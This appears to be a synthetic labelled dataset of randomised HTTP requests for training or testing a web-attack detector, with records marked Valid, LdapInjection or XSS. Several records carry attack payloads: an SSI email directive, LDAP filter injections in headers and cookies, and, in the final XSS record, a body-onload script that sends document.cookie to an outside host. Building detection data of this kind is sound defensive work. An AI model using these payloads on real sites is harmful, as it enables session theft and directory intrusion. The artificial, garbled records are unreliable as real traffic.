GET /QvarsYrmwfvandbeT/9eaas8ddmotjrowuxv/_y.cfm?ea3=uh&oenalry6tbq0=let%24%3F2Haed&mnsoo1wumncoe7=e.%40bV&haeaehIinUrscn=0792388937&utadneli=%3C%21--%23email+fromhost%3D%22www.nayIaT.com%22+tohost%3D%22mailbox.ele.com%22+message%3D%22ohnlN+sls1tr+sn+Rr5en%22+fromaddress%3D%22h0in.com%22+toaddress%3D%22anto.wnw.com%22+subject%3D%22thu%22+sender%3D%22o1n.com%22+replyto%3D%22Eneatt.com%22+cc%3D%22irth%22+inreplyto%3D%22dea+r6cy+dgure%22+id%3D%22tcutAmail%22+--%3E&gZ2rnRotx=826904&pr=7&lz8nhc=40613&nsmsnuog4=3549482&hes=ior%27L++taeedjdpo HTTP/1.1
Host: 226.225.27.181
Connection: close
Accept: */*;q=0.3
Accept-Charset: ks_c_5601-1987;q=0.9, x-mac-chinesetrad;q=0.2, iso-2022-jp
Accept-Encoding: compress, gzip;q=0.0, gzip, compress
Accept-Language: *;q=0.4
Cache-Control: max-stale=87314
Client-ip: 93.255.83.3
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Date: Sun, 18 Nov 07 19:01:31 UTC
If-Modified-Since: Sat, 19 Apr 08 12:01:28 UTC
If-Unmodified-Since: Sun, 29 May 05 07:32:09 GMT
If-Match: "RQ-@Nuph6_o6whkOFda"
If-Range: Sat, 09 Apr 05 10:57:16 CET
Max-Forwards: 32
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Referer: http://www.nsIoVd.it/oarrvc/easTt/rO9swc.js
TE: chunked,deflate;q=0.1,gzip
Trailer: Referer
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 3.3; ij-2n; rv:7.9.5) Gecko/32193077
UA-Disp: 725,135,16
UA-OS: Linux
Via: r06a/1.5 www.ha800fop.jpg, msfaao/4.2 www.cedt.js, hfied/9.6 www.aars.tiff
Transfer-Encoding: deflate
Warning: 728 www.fadyet.png "wm9iowri" "Sun, 18 Sep 05 04:10:06 CET"
----: --------------------

null

End - Id: 39458
Start - Id: 20894
class: Valid
GET /esrhseh/Ue3@3.htm?74s0nhtIftm=srEiCab&atzT=eplr%3C+so%3Dinoiframe%3ER%5Dmo&script-B7tl.XKruO=%26c&sslbuirtea9hS7m=ixkseu7dq9tmi9nika&2AEdropdYziad=tntja&amprD6e9ouote8=iYi7SwS&t8eeelh1otene=07&ivnnd6m=t%3EnMNLrmhoSgus&Rev3dO=5&yepeaec=00711 HTTP/1.1
Host: www.estsx9re.org
Connection: keep-alive
Accept: image/png, image/*, audio/*
Accept-Charset: windows-1250;q=0.0, macintosh;q=0.3, utf-8, windows-1251
Accept-Encoding: 
Accept-Language: men4Hd-7p6oqg;q=0.3, H9louae-dctt, owrvul-O3tsokk;q=0.3, esrnTrHH-bo
Cache-Control: no-store
Client-ip: 27.170.68.43
Cookie: ZOU3Qtmp=etpose;DaV-oFCA=917
Cookie2: $Version="53"
Date: Sat, 07 Nov 09 01:46:44 CET
ETag: W/"PcydmVoKgr0a5TWKi"
Expect: 100-continue
From: iStt7oha@lc2epd8.cz
If-Modified-Since: Tue, 18 Dec 07 05:15:10 GMT
If-Unmodified-Since: Mon, 05 Jan 09 01:29:57 GMT
If-Match: "S6BfwifqVHgmyWEqr"
If-None-Match: *
If-Range: Sun, 29 Apr 07 21:18:20 CET
Max-Forwards: 9156
MIME-Version: 1.4
Pragma: hrm5=hpvt1t
Proxy-Authorization: Basic dGxodXNpYzp0b3VpZWg=
Authorization: raoi neste=eoNienig
Range: 822099-090,811-0
Referer: http://www.rilg2.de/htlifgdl/ogeir/otswsn/ezse.png
TE: chunked;q=0.7,trailers
Trailer: Host
User-Agent: narakrirm (jz@qhBma; b5u4rY@M; hQY@TcE; 3ZR8N_a9IU)
UA-CPU: PowerPC
UA-Disp: 743,400,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2726x7026
Via: HTTP/3.9 www.mGtdeo.png:592, 6.5 147.66.130.158
Transfer-Encoding: identity
Upgrade: seety3/5.3, 0so/7.1, eiesa/6.0, eif/6.6, e5ada4/2.5
Warning: 869 18.197.245.223:73 "nRecvaotldeggbe9ehsO" "Mon, 04 Apr 05 17:24:23 CET"
X-Forwarded-For: 138.202.93.19
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20894
Start - Id: 21193
class: Valid
GET /rouJ/mvIIfXpr.nzGGI.aspx?ehred1olo=%2B%28&insoee=mO+otatj HTTP/1.0
Host: www.wi2etet.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fchb-8edseei;q=0.6
Cache-Control: max-stale
Client-ip: 201.72.152.249
Cookie: RTSsock_streamShttpuXbM=tAhdeoslahb;LdEPK=50029;B_kchildrstmpEq2=@7Ii;neIzr=t6u:ss7;MroptcbsamfThvUG=neotSge|Hdeeo;SdeleteRAUtX=regLa1S9BBnj
Cookie2: $Version="230"
Date: Wed, 06 Feb 08 24:53:52 GMT
ETag: W/"qxZVaoMNQfbgUYb@"
Expect: eCgea=etcnv;nHHl1c=trntA
From: iiteLaco@s0ovono0.de
If-Modified-Since: Sat, 29 Nov 08 15:49:19 UTC
If-Unmodified-Since: Wed, 12 Jan 05 04:10:21 UTC
If-Match: "HcG7zKG7Zmtz6M9"
If-None-Match: *
If-Range: *
Max-Forwards: 204
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: uonUai ots5=eNefts
Range: -498294,082582-,-221
Referer: /t2an7w/itdnogy/eGEaas6o/geuEsype/ounrortc.conf
TE: gzip;q=0.5,trailers
Trailer: Authorization
User-Agent: i2ih/8.6.7.6
UA-CPU: PowerPC
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: HTTP/5.0 245.242.156.171
Transfer-Encoding: identity
Upgrade: pffue/5.9, vho/2.7, cum/1.9, obng/3.4
Warning: 866 www.oconNlik.css "mroi7llcSoci3da" "Tue, 06 Dec 05 15:49:11 CET"
X-Forwarded-For: 188.221.207.247
X-Serial-Number: 041648335
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21193
Start - Id: 26927
class: Valid
GET /q3/g3qmxXDEMqjQa/4isdf3/usz-z-3svh9so/nC7ARt3klsw30LV/r453--6Ue1RKmBnlam80/lImdvTWfF-6i3CI6.php? HTTP/1.0
Host: www.iridalhtp.uk
Connection: sg9uoten
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 177.49.29.12
Cookie: sjAhhna5=01;w8eacy87ii=914930453;xDIYvat=ophp0$iamse ;oO4group byrw=54405;rheavrt=n/a;ged=a0oidtmxoH0
Cookie2: $Version="96"
Date: Sun, 31 Jan 10 14:00:12 GMT
ETag: "5kwEdB.HY4O_Yobzb"
Expect: 100-continue
From: hivetoa@epAldB8o.biz
If-Modified-Since: Sun, 17 Jan 10 10:19:19 GMT
If-Unmodified-Since: Tue, 23 Oct 07 03:52:37 GMT
If-Match: "@chbChm6osl3WLCHx13"
If-None-Match: *
If-Range: "Xryj7FkMhRr78jwaM"
Max-Forwards: 0413
MIME-Version: 3.8
Pragma: ukudehre='hndjh'
Proxy-Authorization: Basic aHB1amJzcHY6bFdhaXQ4dA==
Authorization: Ebseht kgaon=entg
Range: 909287-,-7
Referer: http://www.rahA20y.de/ttdt/ehh5g/Teehtel0/eowa.nsf
TE: trailers
Trailer: If-Match
User-Agent: eieamesnEUrn0Tlae
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7851x9196
Via: 1.1 www.ljjdig.jpeg, 9.4 14.218.6.162, 8.8 222.253.254.73
Transfer-Encoding: identity
Upgrade: nag0E/3.8
Warning: 818 www.epeni.shtml "ttaTrueeopAqad9dns" "Sun, 12 Apr 09 10:10:01 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26927
Start - Id: 17789
class: Valid
GET /iAAHJq8Cc/eiB7knQA0/us/insertTu_zoRTUkxdkj/eS/nEbesiqIncioltehro/3bV4OMuGDyBS/3dZ3/rfc.tiff? HTTP/1.1
Host: 203.188.75.231:80
Connection: close
Accept: image/gif, text/*;q=0.7, image/*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=80600
Client-ip: 242.156.204.195
Cookie: r7harNessOdeg=83378;iteldipe=r1ha
Cookie2: $Version="2"
Date: Fri, 15 Dec 06 07:13:23 GMT
ETag: "bQOqTiKOq1GxNY_-N@G2"
Expect: 100-continue
From: pEoshjbx@ooitatrN.gov
If-Modified-Since: Tue, 14 Dec 04 08:13:51 CET
If-Unmodified-Since: Fri, 17 Dec 04 08:41:52 UTC
If-Match: *
If-None-Match: "olp.qqOUV7qUCpX"
If-Range: Fri, 20 Jul 07 02:43:28 UTC
Max-Forwards: 6
MIME-Version: 3.7
Pragma: lhote=rn3tpnd
Proxy-Authorization: syio 478ut=iQaserny
Authorization: NTLM aThOMWxxSW81ZHVybWJ0YWFucGR0VHJvaXRoUnJvTXE5ZGN0ZWNwbnVvZVJpZXNl
Range: 4-,-358,8760-
Referer: /aiepe/nmen/odSri4r/iqte.wav
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.4 (Windows; U; WinNT 1.2; sa-tc; rv:9.1.2) Gecko/61135611
UA-CPU: StrongARM
UA-Disp: 4032,6122,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 582x198
Via: 0nnlNE/8.4 www.DaiOls.jpeg, 8.1 www.shsc.shtml:001
Transfer-Encoding: identity
Upgrade: aif/1.2
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 990081
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 17789
Start - Id: 5200
class: Valid
PUT /eetaertn/5nY/Rdm/qiwnnondnaszon7/f-N7L758qi4LAedy2u/bNIOIfO5rcpl/j1O7Z9YswePqR-H9s.aspx? HTTP/1.1
Content-Length: 227
Content-Language: 2jlda,srnh,q2qY
Content-Encoding: identity
Content-Location: http://www.asRyo8ja.org/hneai.cfm
Content-MD5: ZXdlN3FvYzB2ZWU4b3BzZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Sep 06 01:19:43 UTC
Last-Modified: Mon, 12 May 08 05:49:11 GMT
Host: www.7Msvx.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: AoTta-oe8td;q=0.5
Cache-Control: max-stale=14
Client-ip: 65.23.172.54
Cookie: weoler=0r;ecmemnfUt=5
Cookie2: $Version="9"
Date: Sat, 30 Dec 06 15:18:51 GMT
ETag: W/"XIDp6nIWE@M@JC_Zu9Mo"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Sun, 18 May 08 08:01:52 GMT
If-Unmodified-Since: Sun, 18 Jan 09 02:24:06 UTC
If-Match: "xneQDEueY9-QVQnHNsqB"
If-None-Match: "djJ-uSu@W_KIjUC"
If-Range: Sat, 08 Apr 06 15:58:51 CET
Max-Forwards: 267
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM cnptb29HaWVua0huZUF5b3luenVlYWlUcGFoaWVpbkliZXJFbHVhb2t0YTlX
Authorization: Digest realm
Range: -71
Referer: /cBPenfea/ehaT.asp
TE: deflate
Trailer: Range
User-Agent: Mozilla/0.8 (compatible; necneet; Open BSD i586; Evkman; he169ntoM; sas9z)
UA-CPU: MIPS
UA-Disp: 696,288,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 523x221
Via: 6.2 165.66.239.10, 3.3 81.192.245.137:26
Transfer-Encoding: deflate
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 691 221.151.61.56 "uSnbuJr" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

qnsiiir=mai3i2&jayO=ceSwindow.open&xOcbp=62&i&osunieqsehwt=eentaUvTtor&jv3xp_g0link=7289&ud=5&eovte=4035370&documentEfQq3R69=>kret?)e>ee1dcopye&rbm5ctcgpon=8369594&dBUNSgcJ8e7=~0dn&sao=2wh)nreuuEocae+ access_log

End - Id: 5200
Start - Id: 9213
class: Valid
GET /t4fOt_Y1YBEf/cxoxjnit/e6bDthlCei/hXcyJQxq8o/edau4toaham3vl/e0OwGy6JnKlJ_FiZ/0lleOesnl8/lrnl6H/ctRi03/ese0ouseu1cp0/dZJEQ2B4ZSw_Smjlh/yv6JaOo2bT0.M--PVv.css?adminETT1Gimg=A&5aNhauNaN5o5ne=7Ey2iehoeYuHmrite&eeadsonirlD=wwZQ-x.ZG8O&dcgeniin5eC=cdAo&asqeev=denE&ak=%24k%3Ce%5D HTTP/1.1
Host: www.eacll.biz
Connection: close
Accept: image/*;q=0.9, audio/*;q=0.2, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.8, gzip, gzip, deflate;q=0.4, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 63.252.193.129
Cookie: oewyenac=l770=nw
Cookie2: $Version="676"
Date: Wed, 22 Mar 06 11:15:40 GMT
ETag: "h.R@X@.Z5kExrCJ"
Expect: 100-continue
From: enjtcitc@et92Icoot.com
If-Modified-Since: Sun, 22 Apr 07 14:30:11 CET
If-Unmodified-Since: Sat, 16 May 09 22:42:17 CET
If-Match: "3z8HE3yLnd4zJ897d"
If-None-Match: *
If-Range: "yclKV_9IEHzUqpUdGp2"
Max-Forwards: 373
MIME-Version: 3.1
Pragma: hraaa0so='wVscna'
Proxy-Authorization: Basic Y2U2cWQ6aHNlMTBwOXI=
Authorization: Digest uri=/zuacrA/u3e0/ttetUcte/w5bhyte.bin
Range: 7-,506-547400,2408-38770
Referer: /e8ofr.fgf
TE: deflate;q=0.4
Trailer: If-Match
User-Agent: oraTtoeg/8.1.7.0.2
UA-CPU: Sparc
UA-Disp: 5248,9403,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 113x871
Via: HTTP/2.7 www.ewaDsqbt.jpeg:07909
Transfer-Encoding: dtTe
Upgrade: g62e/6.8, t6dret/4.6, 0fdou/6.5
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6194472934474
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9213
Start - Id: 27706
class: Valid
GET /yetPxGjC06EuWJgH/Rprocessing-instructionQlLk/et3e/TiAw4bodyRQ5tML/tmrzmw6/yhomezjgl8.pl?Umhouthdr5eHz=s2r++%29ueq%2Fc%296uh%40atm&braonjm39sa=ge&hrmr=6848&aoiye7ucnc=riK HTTP/1.1
Host: www.oryhekero.biz:9911
Connection: ornR
Accept: text/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress, compress;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 162.168.145.143
Cookie: YO=923179;yldetmerEf94nW=9693942582;lMsSim2checse=6noTxEedinm;YpGEmQgkU=3294;37mmCcOrs6=Rrlic;mi149=reAn/>
Cookie2: $Version="1"
Date: Tue, 14 Jun 05 01:37:21 CET
ETag: W/"cMbfyIOoWmPld34ez"
Expect: 100-continue
From: bTem2@peiaee.st
If-Modified-Since: Sun, 24 Oct 04 20:00:23 UTC
If-Unmodified-Since: Sun, 16 Jul 06 08:37:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.8
Pragma: in=eys
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=/estcm/imdsqsr/ozzr/dzda/6nnae6om.swf
Range: -672,-796173
Referer: http://www.ssosz.uk/fldujto/Nifyie/NDcmao/gqtve/trrsitye.js
TE: chunked,deflate;q=0.6,gzip;q=0.8
Trailer: TE
User-Agent: Neehohtetieuedhnqem5
UA-CPU: PowerPC
UA-Disp: 704,2208,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 576x948
Via: 0.0 www.naiea.gif:74
Transfer-Encoding: identity
Upgrade: 9arbi/8.9, aiFsaw/7.4, xsnrbe/3.3, 4rueeh/2.6
Warning: 111 www.Orhmqi8.gif "Tlansmset6sdtayi" 
X-Forwarded-For: 241.242.54.210
X-Serial-Number: 166720972543861206
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27706
Start - Id: 39021
class: LdapInjection
PUT /hjkScafTgbyj_OmzEJT/RlfromIoZv/pKbrWuf3la@7Xp/tsolemu.nsf? HTTP/1.1
Content-Length: 178
Content-Language: gohncEeW,2dipt8,at
Content-Encoding: deflate
Content-Location: /wrcuepsr/oaytAQ/oroau5/nelhaot.css
Content-MD5: YTI2bnVvaWZJY2FocXB1bQ==
Content-Type: application/x-www-form-urlencoded
Host: 246.214.157.228
Connection: keep-alive
Accept: audio/*, text/html;q=0.0, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: 2sel9uN-faylsayq;q=0.5, titjrr-i;q=0.2
Cache-Control: max-stale
Cookie: 2shhnfdhcE=tstokt
Date: Wed, 23 Jun 04 12:01:57 UTC
Expect: iohean
If-Modified-Since: Thu, 03 Jun 04 16:38:39 GMT
If-Range: Thu, 07 Jul 05 02:18:58 CET
Max-Forwards: 228
Referer: http://trrysao2.net/aw9ost/rk7oS.sh
TE: gzip;q=0.6,deflate,trailers
User-Agent: b0w6BKaUVI http://www.a83aaisl.fr
UA-Pixels: 5841x328
Via: HTTP/7.8 21.117.55.190, 7.8 237.44.250.70, HTTP/9.7 www.Bbntogh.css:11
Transfer-Encoding: compress
Upgrade: gapa/3.3, Rko/9.5, urtrhe/4.0
X-Forwarded-For: 19.167.50.215
~~~~~: ~~~~~~~~~~~~~~

ctetnKotisSanY=66514405&uinm0=8&tiosrzlsluoAzi=3329450494&n9zHotst=oYS2mA&Nuuofsh=@n sd&qucnnoob0rr=9916892946&xk_q@=Eili&_LHh2=s<lts&ae3UilpKmsjftar=6007283675&werhs4meo=oda

End - Id: 39021
Start - Id: 32842
class: Valid
POST /rdmtrb/oA8/libfLO/lmIj67nlt.F.jpg? HTTP/1.0
Content-Length: 314
Content-Language: hj1s
Content-Encoding: gzip
Content-Location: http://www.zNejolei.biz/lamt.asmx
Content-MD5: RWVlbm5weXJzRWJ2c25wdw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Sep 09 18:19:25 CET
Last-Modified: Mon, 08 Dec 08 03:36:53 CET
Host: 154.73.27.63:80
Connection: qe6un
Accept: video/*;q=0.5, audio/basic
Accept-Charset: x-mac-icelandic;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: sedlSdSe-s5efaI;q=0.5, Orell1un-So;q=0.6
Cache-Control: no-cache
Client-ip: 50.137.205.249
Cookie: T1V1S=ehNib2wetr;K6HghmQHx3B0a=frnygJrepgeReih
Cookie2: $Version="941"
Date: Thu, 18 Mar 04 01:50:31 CET
ETag: W/"pkoaBVwAxHTMGMSn2"
Expect: twhad1=enr2;arnRenr=lte7hril
From: hqso@atPmE.de
If-Modified-Since: Mon, 31 Jul 06 11:12:53 UTC
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Basic b2xlQTpiZWZiemF0
Range: 2086-1,90-
Referer: /tgto/iknu.jpg
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 8.1; 4i-ny; rv:4.0.8) Gecko/11689431
UA-CPU: x86
UA-Disp: 1558,006,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: sai/5.9 www.qvlag.htm
Transfer-Encoding: deflate
Upgrade: d8jw0/9.1
Warning: 416 252.235.193.93 "neHp9eaees" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

cehmiohbhsi=38220505&oyrwgupiemwqt=02827&8ee=7955435616&tMHCbin-2cxivs=gmG6KvlF&SitiEtte3=0fm s&lekeeo=shzfjnhsaCdDhjm6ec&irtaA=407301&slzRhrol=803&0-dBlNobject_hmPv=Lunst|r:nett)a&rhy2la0Nl5mrayd=4L-l2xCMr&idor=30&a5dqhec9l=1746773524&taonsArn=042669&OLjKz4=betweenhaving& g sfromnfd f &wzuc=weiaehtaccesh

End - Id: 32842
Start - Id: 37461
class: LdapInjection
GET /olXQiEf7i_e.4aKX0O/wscdBamzhrbeDs/t8l2stv/o7ik7RbhouzInMv0/ntb3reeG/ttVVdJXncO9iwMAJvlu/v5mM/np-/ngaLV3CGttQ83PY.jpg? HTTP/1.0
Host: www.LeYeciot.it:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, compress;q=0.5
Accept-Language: scVdowsi-yU, tisE-tieet;q=0.1, ievNc9h-rerfn
Cache-Control: max-age=17232
Client-ip: 212.186.34.75
Cookie: irN=08474;smm=iDv;ayd=nRfHreiutadmlt;sptmiyQnreoeaig=ssh<lce tdhfn;eansb=exr)(&(objectClass    =inp*);aS9GsYgey1=8251
Cookie2: $Version="1"
Date: Tue, 26 May 09 01:18:12 GMT
ETag: W/"wSEqyhgTm9XkH7bf"
Expect: 100-continue
From: rOjoxac4@o2cz.biz
If-Modified-Since: Sat, 20 May 06 12:19:01 UTC
If-Unmodified-Since: Sat, 05 Nov 05 04:14:31 CET
If-Match: "_KnqstF.MYBxABuq"
If-None-Match: *
If-Range: "MnFK-1XZmdkLnD7K"
Max-Forwards: 48
MIME-Version: 1.8
Pragma: mtagk=oessDz
Proxy-Authorization: Digest uri=/uso6on.bin
Authorization: Digest qop=auth-int
Range: 0504-,-286
Referer: http://www.terarY.cz/4dis/lr1brohe/redev3.sh
TE: trailers,chunked
Trailer: Referer
User-Agent: j7ediotnhs (sL76a1XPvE)
UA-CPU: PowerPC
UA-Disp: 7037,1679,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 161x1713
Via: FTP/7.3 www.znsi5w.gif:664, HTTP/5.4 176.109.247.236, meeehe/4.0 www.Reiess.tiff
Transfer-Encoding: identity
Upgrade: oii/8.9
Warning: 814 www.azme.gif "Aehomnrgnhad8toeb" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37461
Start - Id: 5536
class: Valid
POST /LnIONL0/UN7DN.z/nfe/daeapootdkq3Oe56ert/dRMRimgKOdHV/reSef/anaeaen/0link@/iZQKd1dxaXiMv/un.png? HTTP/1.0
Content-Length: 186
Content-Language: dDrh,sanwle
Content-Encoding: gzip
Content-Location: http://tjvBaE.net/dNlw8m/NkiRhw.asmx
Content-MD5: Zm9hYW5IYTZvaGllaGhpaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 May 09 17:50:23 CET
Last-Modified: Sat, 13 Nov 04 04:51:29 UTC
Host: www.tqR7haai.org:14932
Connection: close
Accept: audio/x-wav
Accept-Charset: windows-1254;q=0.2, x-mac-icelandic, x-mac-korean;q=0.2, x-mac-turkish
Accept-Encoding: deflate;q=0.9, compress, deflate;q=0.5, identity;q=0.3, identity
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 151.62.216.82
Cookie: dPpPbwindow.openB7r=evalrokNb941r > h;6oAincludeArxKDLzK=6341;yqpPIe=6;etnae=ClibrnCt9rahadmin;3SxtermKP.IIstdinfinserta=iePLWT612L8;lxmlhSprocessing-instruction='
Cookie2: $Version="62"
Date: Thu, 07 May 09 12:54:10 GMT
ETag: W/"H8JPI40baMqM55lkNgM"
Expect: 100-continue
From: rCwltOn@8nntmteThr.de
If-Modified-Since: Sat, 17 Mar 07 22:14:22 GMT
If-Unmodified-Since: Sat, 07 Jul 07 01:31:05 CET
If-Match: "1oGrJuaZKr_PJXE"
If-None-Match: "05GS225Z7HzvDTUT"
If-Range: Mon, 07 Mar 05 16:59:59 UTC
Max-Forwards: 11
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic YXRvVGhuOnRvYTQ=
Authorization: Digest username="nuiate"
Range: 6092-077254
Referer: /eer4krea/0rtuer.conf
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 7.9; Ua-nl; rv:0.7.1) Gecko/82684778
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 333x0999
Via: FTP/7.0 www.oem79j.html, 8.4 www.t1sei5.jpeg
Transfer-Encoding: gzip
Upgrade: Hihns/1.6, ORos/3.8, etn9/6.1
Warning: 096 www.Sbfne.tiff "89IbUita" "Wed, 23 Dec 09 11:24:02 CET"
X-Forwarded-For: 87.149.9.72
X-Serial-Number: 5097796244152405039
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

tdevnTdeuu=88905&cL=meegnouht82nhthhcl&kNswm7=ueZechor&ax0tx2=abdsystemw ahee3a?betuVyi&0t0odLoptS-K=eteci;aa&86-RJeUfinsert8=1gkE0bu3XP&noe=2&nph-DstdinVQBk=ire:dne(lmlibtgja$

End - Id: 5536
Start - Id: 9765
class: Valid
GET /ediiie3dltorrroSsc/5sDht4e/sd1d/fsnripmuiiI/npe8aenrYm/p4/ld5mdcram2teenc6n9/aiei92C9r/vIognNdftDR0WvO/kDtuG/6EaEjD7A5URC.asp?pmnsoecyaml1rri=77&uoewerp=ne6t&vbscriptQDaEH=+t2r&eenrl8As=dh%3C&s79iade=nne+&ntymwtsdiAea=lmzdntkaAecd&n3ynn6su2ateapc=de3ditiFipeshutdownre&tet=StzlunsMyeaj1&fhhh5ewhsa8le=84&etotaghr8m=tXasiJO9LW&htgntg8odetat=87 HTTP/1.1
Host: www.hrNeo.com
Connection: keep-alive
Accept: image/*, video/mpeg;q=0.7
Accept-Charset: x-mac-greek;q=0.0, windows-1250, x-mac-greek;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: AetoiC=E
Client-ip: 129.84.99.73
Cookie: tauE7rtm=ont   ihinsertoG>ea7&legi;52v0a0Y9pscript= el6:7=
Cookie2: $Version="9"
Date: Thu, 17 Jan 08 17:24:28 GMT
ETag: "4fivot.J_rjq4aU"
Expect: eUixlzsn=Xhdnitb
From: 1e8wn5to@suCin.net
If-Modified-Since: Sat, 25 Feb 06 12:10:08 CET
If-Unmodified-Since: Sun, 24 Sep 06 09:58:21 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 27 May 08 12:40:44 GMT
Max-Forwards: 825
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Ietga urmeulj=Dhnw
Authorization: yoart rhadah=tohsNyaf
Range: -58387
Referer: http://www.hnfoeno.net/ahfa7te/Ueaws.pl
TE: trailers,trailers,gzip
Trailer: Upgrade
User-Agent: miqnog/1.1.3
UA-CPU: 68000
UA-Disp: 5705,3975,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 493x9189
Via: d1o/6.2 36.199.121.126:8, 7.6 www.lgaTist.css
Transfer-Encoding: gzip
Upgrade: cds2Qc/0.8, daru/8.7, roew/2.1, hnm/9.5, saile/8.5
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 45559404209574
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9765
Start - Id: 47832
class: XSS
GET /re/hDeh/dWOBUD2T4mR.PivOkh6/j1gy/sdrn/edelete2fEE0vIEU1l.cfm?bcqxehiis6s=oe5&oorwnabtmldreil=794&n5eid=%3Cbody+onload++%3D++%22+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.erarchas.com%2Fcgi-bin%2Formaer.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E&riimqonel85=2laedigeNjtae HTTP/1.0
Host: www.ssbt.it
Connection: rprbm2
Accept: */*
Accept-Charset: gb2312;q=0.0, us-ascii, iso-8859-7;q=0.2, x-mac-hebrew;q=0.1
Accept-Encoding: gzip, compress;q=0.7, gzip;q=0.5, identity, gzip;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 43.155.196.55
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="540"
Date: Tue, 09 Feb 10 15:56:08 UTC
ETag: W/"fABPwMXu_DoARcNe"
Expect: 100-continue
From: niava@schow.it
If-Modified-Since: Fri, 23 Mar 07 14:47:54 UTC
If-Unmodified-Since: Thu, 20 Dec 07 23:46:56 GMT
If-Match: *
If-None-Match: "m1JK9pR8yar7L562uPv8"
If-Range: "eTzubZE.vLqT_k6o"
